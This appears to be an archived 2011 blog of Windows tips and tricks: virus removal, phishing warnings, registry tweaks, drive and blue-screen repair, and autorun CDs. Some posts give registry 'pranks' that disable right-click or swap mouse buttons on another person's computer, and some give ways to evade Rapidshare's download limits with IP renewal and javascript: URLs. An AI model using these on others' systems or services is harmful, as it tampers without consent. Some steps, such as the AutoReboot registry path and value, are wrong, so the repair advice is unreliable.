etc.

Now u can copy the file to "%windir%\System32" folder.

C. Give following command in Command Prompt:

sfc /SCANNOW

It'll automatically restore the files.

Double-clicking on any drive opens search option

Solution :-
That's a virus named as ravmon.exe and autorun.inf
Scan first with a good antivirus [Nod32 Recommanded]
then try this trick.

First show the hidden files and folders options then try this method

1. Go to Start-->run and type cmd then click ok

2. If u want to remove the infected file from c drive then type C: in command prompt and press enter

3. Type autorun.inf and press enter
autorun.inf file is opened

4. Now type "attrib autorun.inf -s -h -r" and press enter

5. Now delete the file by typing
"del autorun.inf" and press enter

6.Now type autorun.inf and press enter now, u will find no infected autorun.inf file.

7. same way do for all other drives then restart ur pc ie; for D , type d: and press enter and do the other steps


Saturday, March 19, 2011

Facebook Email Scam


With the recent announcement of facebook adding @facebook.com email to user's accounts, the scammers have started to target users.

Security experts are warning of a new Facebook 'phishing' scam designed to steal your facebook log-in credentials. The facebook phishing scam promises you a '@facebook.com' email address. but is actually a trap to gather log-ins and passwords for the malicious site.

"The first sign of phishing is to get your @facebook.com email address before someone else takes it.
"Then, a bit.ly link redirects you to a Facebook App which contains an iFrame that points to a compromised site that is hosting the phishing page.
"Once you click 'Next', your information is sent to the phishers and your account is hijacked immediately. Then, your facebook status is updated to try to scam friends/family."

Prevent this, and other attacks, is to revisit Facebook's settings page and select the option that 'informs users when an attempt to access their account has been made on another computer'

Beware of facebook virus!!!!!!!!!!!


Just a few minutes back, i saw too many people recommending same video to almost everybody on their friend list, so i thought why not to find out what it is. And see what i got
Its my humble request to all my dear friends and everybody on facebook, please take care of this little thing.

There is a new virus on facebook which looks like this.

 This type of video link will appear to your wall from any of your friend, and once you click on it all members of your friend list will get the same link from your profile. So the best way to ignore this virus, be patient and dont click on this video..

 The other one is bit.ly/fC1AmB which says Hey, check out this girl, lol, she must be out of her mind for making that video!: bit.ly/fC1AmB 

Friday, March 18, 2011

Watch Star Wars Movie in Command Prompt

Just type in
telnet towel.blinkenlights.nl
in the 'Run' command and
watch the episode!

Hidden unknown fact in Microsoft Word

Bill Gates still doesn't know why it happens:
Try out yourself...
Open Microsoft Word and type
=rand(200,99)
and then HIT ENTER....see what happens.
it won't hurt ur system!!

Chat With Command Prompt !!!

If you want personal chat with a friend


you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.


Firstly, open Notepad and enter:


@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Now save this as "Messenger.bat". Open the .bat file and in Command


Prompt you should see:


MESSENGER


User:


After "User" type the IP address of the computer you want to contact.


After this, you should see this:


Message:


Now type in the message you wish to send.Before you press "Enter" it should look like this:


MESSENGER


User: 27.196.391.193


Message: Hi


Now all you need to do is press "Enter", and start chatting!

Reverse the mouse buttons ;) [Prank]

1) No context menu

What will you see when you right click on the desktop? You will see a context menu which says arrange icons, refresh,..and so on. Are you angry at your friend for not wishing you for you B'day? Do you wanna play a trick on a newbie in your family who is new to computers? This is a cool trick to play. By this tweak, you will be able to disable the right click on the desktop or any icons/files/folders/applications... But right click will work on taskbar of the start button and registry. So, dont worry!!!
Open your registry and you will see all unknown files like HKEY_CLASSES_ROOT....... and so on. Don't panic. Follow this path. HKEY_CURRENT_USER>SOFTWARE>MICROSOFT>WINDOWS>CURRENT VERSION>POLICIES>EXPLORER. On the right side of the registry, you will see two files(in general) named 'default' and 'NoDriveTypeAutoRun'. Right click on the empty space in the registry and goto New>DWORD VALUE and name it as "NoViewContextMenu". Remember, no spaces and N,V,C,M should be capitals. Right click on this and click modify. The default value will be 0. Change it to 1. Note: DONOT CHANGE THE HEXADECIMAL TO DECIMAL. Click OK. Close your registry and logout. Bingo!!! Once you login again, right click wont work. Your friend will be perplexed and the next thing he/she does is call the system administrator not knowing that not all system administrators will be knowing about registry. Now, to enable it again. follow the same path and set the value to 0. Logout and then login to see the effect.

2) Reverse the mouse buttons
This is a cool trick to play on newbies. Actually, there are two ways to do this. One is changing the settings in the Control panel and the other is through editing registry. You can do it either way. But I prefer the second way, which is challenging.
(i) Through Control Panel - goto Start> Control Panel> Printers and other hardware> Mouse. In Button configuration, enable the switch primary and secondary buttons option and click OK. But remember, you have just swapped the mouse buttons. So, for OK, you have to click the right mouse button. The newbie will be perplexed. Well, this trick is good for left handers.
(ii) Editing the registry - By default the left mouse button is the primary and the right is secondary. Open your registry and follow this path:
HLEY_CURRENT_USER>Control Panel>Mouse and on the right side of the registry, create this String value(REG_SZ): 'SwapMouseButtons' and set its value to 1. Bingo!!! You are done. Log out/Restart the computer.

You can try this: Combine tricks 1 and 2. That means, this will result in swapping of the mouse buttons and disabling the left click(once the buttons are swapped). User is ready to call system administrator cuz he feels that the system is behaving wildly.

Tips to recover scratched CD's from simple solutions


1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation


* Fingermarks/prints cause 43% of disc problems!
* General wear & tear causes 25% of disc problems!
* Player-related issues cause 15% of disc problems!
* Remaining Others

Multiple Logins in yahoo without Software


1) Go to Start
2) Navigate to HKEY_CURRENT_USER-->Software-->Yahoo-->Pager-->Test
3)ON the Right side if the page , Right click and choose new Dword Value.
4) Rename it as " Plural ".
5)Double click and assign a decimal value of 1.
6) Now close registry and restar yahoo messenger and try Multiple Login

Different Types of Computer Viruses

There are Different Types of Computer Viruses could be classified in (origin, techniques, types of files they infect, where they hide, the kind of damage they cause, the type of operating system or platform they attack) etc. Let us have a look at them…

Computer Virus is a kind of malicious software written intentionally to enter a computer without the user’s permission or knowledge, with an ability to replicate itself, thus continuing to spread. Some viruses do little but replicate others can cause severe harm or adversely effect program and performance of the system. A virus should never be assumed harmless and left on a system. Most common types of viruses are mentioned below:

Resident Viruses
This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc.

Examples include: Randex, CMJ, Meve, and MrKlunky.

Direct Action Viruses
The main purpose of this virus is to replicate and take action when it is executed. When a specific condition is met, the virus will go into action and infect files in the directory or folder that it is in and in directories that are specified in the AUTOEXEC.BAT file PATH. This batch file is always located in the root directory of the hard disk and carries out certain operations when the computer is booted.

Overwrite Viruses
Virus of this kind is characterized by the fact that it deletes the information contained in the files that it infects, rendering them partially or totally useless once they have been infected.

The only way to clean a file infected by an overwrite virus is to delete the file completely, thus losing the original content.

Examples of this virus include: Way, Trj.Reboot, Trivial.88.D.

Boot Virus
This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive.

Examples of boot viruses include: Polyboot.B, AntiEXE.

Macro Virus
Macro viruses infect files that are created using certain applications or programs that contain macros. These mini-programs make it possible to automate series of operations so that they are performed as a single action, thereby saving the user from having to carry them out one by one.

Examples of macro viruses: Relax, Melissa.A, Bablas, O97M/Y2K.

Directory Virus
Directory viruses change the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus.

Once infected it becomes impossible to locate the original files.

Polymorphic Virus
Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.

Examples include: Elkern, Marburg, Satan Bug, and Tuareg.

File Infectors
This type of virus infects programs or executable files (files with an .EXE or .COM extension). When one of these programs is run, directly or indirectly, the virus is activated, producing the damaging effects it is programmed to carry out. The majority of existing viruses belong to this category, and can be classified depending on the actions that they carry out.

Companion Viruses
Companion viruses can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they "accompany" the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses).

Some examples include: Stator, Asimov.1539, and Terrax.1069

FAT Virus
The file allocation table or FAT is the part of a disk used to connect information and is a vital part of the normal functioning of the computer.
This type of virus attack can be especially dangerous, by preventing access to certain sections of the disk where important files are stored. Damage caused can result in information losses from individual files or even entire directories.

Worms
A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antiviruses.

Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.

Trojans or Trojan Horses
Another unsavory breed of malicious code are Trojans or Trojan horses, which unlike viruses do not reproduce by infecting other files, nor do they self-replicate like worms.

Logic Bombs
They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.

Virtual graphic card

PC Version
MINIMUM SYSTEM REQUIREMENTS

    * Windows® 98/Me/2000*/XP*
    * Intel Pentium™ III or AMD Athlon™ 500Mhz
    * 256MB RAM
    * 32MB Direct3D-compatible video card with Hardware T&L, 32-bit color,
      DirectX™ 9-compatible driver (e.g., NVIDIA GeForce 2 class)
    * 2.4GB free Hard Drive Space
    * Additional hard drive space for Windows swap file and saved game files
    * 8X CD-ROM
    * 16-bit DirectX™ 9-compatible sound card
    * 56k modem, DSL, Cable Modem or LAN for Multi-play
    * 100 BaseT LAN connection for Light Cycle Multi-play
    * DirectX™ 9 (included)
    * Java-compatible Web Browser (e.g. Internet Explorer 5.0 or Netscape Navigator 4.7 or later)


RECOMMENDED SYSTEM

    * Windows® 98/Me/2000*/XP*
    * Intel Pentium™ 4 or AMD Athlon™ 1Ghz
    * 512MB RAM
    * NVIDIA GeForce FX video card
    * 2.4GB free Hard Drive Space
    * Additional hard drive space for a Windows swap file and saved game files
    * 32X CD ROM
    * Sound Blaster® Audigy 2 sound card w/EAX® ADVANCED HD™**
    * DSL, Cable Modem or LAN for Multi-play
    * DirectX™ 9 (included)


SUPPORTED VIDEO CHIPSETS

NVIDIA GeForce FX, NVIDIA GeForce 4; NVIDIA GeForce 3; NVIDIA GeForce 2; ATI Radeon 9700; ATI Radeon 9000; ATI Radeon 8500; ATI Radeon 7500; ATI Radeon 7200; Matrox Parhelia chipset; Matrox Millennium P750


Mac Version
MINIMUM SYSTEM REQUIREMENTS

    * Mac OS X version 10.2.8
    * 700MHz PowerPC G4 processor
    * 256MB of RAM; 512MB for iMacs
    * 32MB Radeon 7500 / GeForce 2MX video card
    * 2.5GB of hard disk space
    * QuickTime 6.4


RECOMMENDED SYSTEM

    * Mac OS X version 10.3.3 or higher
    * 1GHz PowerPC G4 processor or higher
    * 512MB or higher
    * 128MB Radeon 9700 / GeForce 4 TI
    * QuickTime 6.5 or higher
    * Multi button mouse recommended
    * Broadband Connection or Local Area Network (LAN) for Multiplayer
    * 100 BaseT LAN connection for Light Cycle Multi-play


After downloading 3-D Analyze, here's how to use it:
http://software.emule.com/3d-analyze-2-36/download.php

* Decompress the archive, and copy the extracted files to their own folder. Then run 3DAnalyze.exe.


o Click the SELECT button and browse to the game executable TRON.exe.
  Note that older versions of 3D-Analyze also wanted you to provide the path to game .dll files. (Which is the same directory as the game executable.) This is no longer required, starting with version 2.3a.
o Select the checkbox labelled emulate HW TnL caps.
  You could try experimenting with the other checkboxes below it, but this first one is critical to making the game work.
o Finally, click the RUN button.
o Now enjoy the games of higher versions.....!!!!

Thursday, March 17, 2011

Rapidshare Hacked, unlimited upload, no countdown


Rapidshare Hacked, unlimited upload, no countdown

UNLIMITED download/upload
Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:

clean up IE or netscape or Firefox cookie( In this case the one that belong to rapidshare website)
On Command prompt (open MS-DOS)
type -----> ipconfig /flushdns <---Enter
type -----> ipconfig /release <---Enter
type -----> ipconfig /renew <---Enter
type -----> exit <--------Enter

Or save these commands in a bat file and run it everytime you need to fool Rapidshare server. Remember to clean up rapidshare cookie in your temp Internet files folder.

Now you should be ready to download/upload as many files as you want from their server.

another way, get proxies from the internet and apply to the browser.
some of proxies might not work though...

Note:
If you are on a LAN and behind a router (using NAT, for example)---this will not work.
If you use a fixed proxy--- this will not work.
If you have a fixed IP address from your ISP or college or employer or whatever -- this will not work.
If you happen to get the same IP address from your DHCP server because it's assigned to you -- this will not work

NO waiting
THIS "cheat" for RAPIDSHARE DOWNLOADS eliminates the "WAITING" for the file. No more COUNTDOWNS. So heres what you do:

1. First, Find a rapidshare download.
2. Hit the FREE BUTTON, like always.
3. While your waiting for it to countdown, change the URL in the bar to:
Code:
java script:c(countdown = 0);
and hit ENTER or the GO button over and over. Eachtime you do so, it decreases 10-20 seconds. Few times and the link appears.
or you can simply do the code below ONCE
java script: for (i=0; i<30; i++) { c(); }

Monday, March 14, 2011

Hard drive gone bad


The most common problems originate
from corruption of the master boot record, FAT, or directory.
Those are soft problems which can usually be taken care of
with a combination of tools like Fdisk /mbr to refresh the
master boot record followed by a reboot and Norton disk doctor
or Spinneret.

The most common hardware problems are a bad controller, a bad
drive motor, or a bad head mechanism.
 

Questions :-
 

1. Can the BIOS see and identify the hard drive correctly? If
it can't, then the hard drives onboard controller is bad.

2. Does the drive spin and maintain a constant velocity? If it
does, that's good news. The motor is functioning.

3. If the drive surges and dies, the most likely cause is a
bad controller (assuming the drive is cool). A gate allowing
the current to drive the motor may not be staying open. The
drive needs a new controller.

4. Do you hear a lot of head clatter when the machine is
turned on and initialized (but before the system attempts to
access the hard drive). Head clatter would indicate that the
spindle bearings are sloppy or worn badly. Maybe even lose and
flopping around inside.

5. There is always the possibility that the controller you are
using in the machine has gone south.
 

Solutions :-
 

1. If the drive spins, try booting to the A> prompt, run Fdisk
and check to see if Fdisk can see a partition on the hard
drive. If Fdisk can see the partition, that means that it can
access the drive and that the controller electronics are
functioning correctly. If there is no head clatter, it may be
just a matter of disk corruption which commonly occurs when a
surge hits you machine and overwhelms the power supply voltage
regulator. It commonly over whelms the system electronics
allowing an EM pulse to wipe out the master boot record, file
allocations table, and primary directory. Fdisk can fix the
master boot record and Norton Disk Doctor can restore the FAT
and Directory from the secondaries.
2. The drive spins but Fdisk can't see it. Try the drive in
another system and repeat the test to confirm that Fdisk can't
read through the drives onboard controller. If it sees it in
another system, then your machines hard drive interface is
bad. You can try an upgraded or replacement controller card
like a Promise or CMD Technologies (there are others) in you
machine after disabling the integrated controller in the BIOS,
but if the integrated controller went south, it may just be
symptomatic of further failures and you'd be wise to replace
the motherboard. Trying the drive in another machine also
eliminates the variable that your machines 12 volt power
output being bad

3. If you get head clatter but a constant velocity on the
drive motor (no surging), you might try sticking the hard
drive in the freezer for about 12 hours. This is an old trick
from back in the days of the MFM/ESDI driver era. This can
cause the drive components to shrink enough to make the track
marker align with the tracks. We don't see that kind of
platter spindle wear much anymore, but back in the old days,
the balancing and bearings weren't as good. Still, under the
right circumstances, it might help. It would depend on how old
the drive is and how many hours of wear have occurred. You
have to be quick to get your info off the drive when it works.
Back then, the drives were much smaller, so there wasn't so
much to copy. So, go after the important data first.

4. The drive doesn't spin. Either the onboard controller is
bad or the motor is bad (assuming you did try the drive in
another machine). It's time to hit the net and local
independent shops to see if you can locate another drive of
the same make and model that's good. Since the drive is
probably an older drive and no longer in distribution, your
best bet is to find an identical used drive. If you know
someone with the same make and model, you might be wise to try
and persuade them to sell you their drive with an offer of
providing them with a free upgraded drive. If you can locate
an identical drive, start with the controller replacement ...
this is the simplest and least invasive. If swapping the
controller doesn't produce the desire result, you can tear
into the drive and swap the motors. While you have both drive
opened up to accomplish this, scrutinize the platters, heads
and armatures. You might even hook the drive up and power it
from a system with both drives attached. This way, you could
see anything that deviates between the actions of both drives
when they are initialized. Swapping patters is unlikely to
produce any positive result. They are a balanced system like
the tires on your car and I suspect that the balance will be
different for each drive as will other variables.

5. There's always Ontrack Corp. who will attempt to recoup
your info starting at $500 and going up from there. They don't
fix and return the drive either.

If the info is all that important to you, I would seek some
professional and experience technician in your locality who
makes his living from servicing and building computer systems
... not just selling them. If you have had much experience
salvaging information from bad hard drives, your likelihood of
success is low. In the case of soft corruption, all utilities
have their eccentricities. Often times, Norton Disk Doctor
will go too far (if you let it). It's wise to just let those
utilities small steps and then have a look at the drive and
see if you can copy it off. Norton will go so far as to rename
directories and files, and even delete them or break them up
into fragments which are useless.

Blue screen error in windows XP sp2 and sp3 and its solution


This problem may occur due to a number of reasons like “Automatic Restart”, or due to cache and other Windows file that may incur a serious error. We, in this article provide solutions for these different causes such that it’s not required to always format your operating system and reinstall it again.

Cause 1 and its solution :

Your system may have the “Auto Reboot” feature enabled due to which the system restarts automatically without any notice. To disable this feature, first click on “Start” and then on “Run”.
Type “regedit” in the box and press ENTER.
The Registry Editor opens. Navigate to

HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Control>ContentIndex>CrashControl

On the right hand part of the Registry Editor box, right click on “AutoReboot” and select “Modify”.
Change the value to “1″. Click OK and exit from the Registry Editor.
Restart your computer. The Automatic restart feature is now disabled and your system should not undergo any problem henceforth.

Cause 2 and its solution :

The next reason this problem occurs may be due to critical errors that are incurred by the cache files or other windows files on your system. Now, this can be rectified in two different ways :

#1. Restoring files and settings that helped Windows to run smoothly.

Every time your Windows XP shut downs properly, it saves your settings and thus records or creates a backup of the files and settings at that time. You can fix your system by restoring these settings such that the os runs without any errors. Following the steps below, you can always restore the system with the settings that worked properly.

1. Restart your system.

2. As the system reboots, press F8 quickly before the Windows Start up starts.

3. This opens the Windows Advanced Options Menu. Select the option “Last Known Good Configuration (your most recent settings that worked)” and then press ENTER.
This restores your system with the most recent settings and files that worked and helped Windows XP to run smoothly. Thus, from now on your system should work properly.

#2. Fixing the problem by running Windows in Safe Mode.

Follow the steps below to rectify your problem :

1. Restart your system.

2. As in the previous fix, press F8 quickly to open the Windows Advanced Options Menu.

3. Select the option “Safe Mode” and press ENTER.
Windows XP starts in Safe Mode with all of its start-up programs disabled and some of its programs not working. Now, click on “Start >Run”. In the box, type “msconfig” .
The System Configuration Utility wizard starts. Click on “Launch System Restore”.
Then click on “Restore my system to an earlier time”.
Choose a restore point at a time when everything on the system was running smoothly. Then click “Next”. The system restarts and it is displayed that the system is being restored. Once the restart is complete, your system is fully restored to the chosen settings and Windows will run without any problem.

Cause 3 and its solution :

Sometimes your system can be affected in such a way, that when you start your computer, as soon as the Windows Start up screen appears, the computer restarts. This process continues in a loop resulting in continuous multiple reboots, none being completed properly. This problem occurs if the “Kernel32.dll” file goes missing or damaged. To solve this problem, we recover the missing file from the Windows Recovery Console or the Windows XP installation CD.
Follow the steps below to repair your system :

    * Open the Recovery Console wizard if you have it installed. If not, then insert the Windows XP installation CD and restart the computer.
    * Boot from the CD and follow the instructions in the setup till you are given an option to repair your system or to install a fresh copy of Windows.
    * Select to repair by pressing R.
    * For a dual-boot or multiple-boot system, select the option (Operating System) you need to repair.
    * Give the Administrator password (if any) when you are asked for it.
    * A command prompt appears. Type “cd system32″ and press ENTER.
    * Then type “ren kernel32.dll kernel32.old” and press ENTER.
    * Now, type “map” and press ENTER.
    * Notice the letter indicating the CD-ROM drive containing the Windows XP CD. This is displayed similar to the format : G:\Device\CdRom0
    * Now, type expand<drive name>\i386\kernel32.dl_ [Replace "<drive name>" by the letter indicating the CD-ROM drive].
    * Press ENTER.

[Note : Be sure to notice the 'underscore' character after 'l' in the word "kernel32.dl_"]

A message “Kernel32.dll, 1 file(s) expanded” appears indicating that the file “Kernel32.dll” has been recovered.

    * Type exit . This restarts the computer.
    * Now, take out the Windows XP CD from the CD-ROM drive.

Windows XP starts normally and runs smoothly without any problems.

These solutions are a lot easier and less time consuming than formatting and reinstalling Windows. Hope this would help you to know Windows better.

Javascript Trick by Narendra kamath

just copy and paste in a clear address bar of your browser ,press enter and see.....






javascript:function flood(n) {if (self.moveBy) {for (i = 15; i > 0;i--){for (j = n; j > 0; j--){self.moveBy( 1,i);self. moveBy(i, 0);self.moveBy( 0,-i);self. moveBy(-i, 0); } } }}flood(6);{ var inp = "htamaK ardneraN yB **moc.topsgolb.nufrofskcirt.www ot emocleW ** "; var outp = ""; for (i = 0; i <= inp.length; i++) {outp =inp.charAt (i) + outp ; } alert(outp) ;}; reverse

Friday, March 11, 2011

Make An Autorun File For Your Cd


If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you write: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"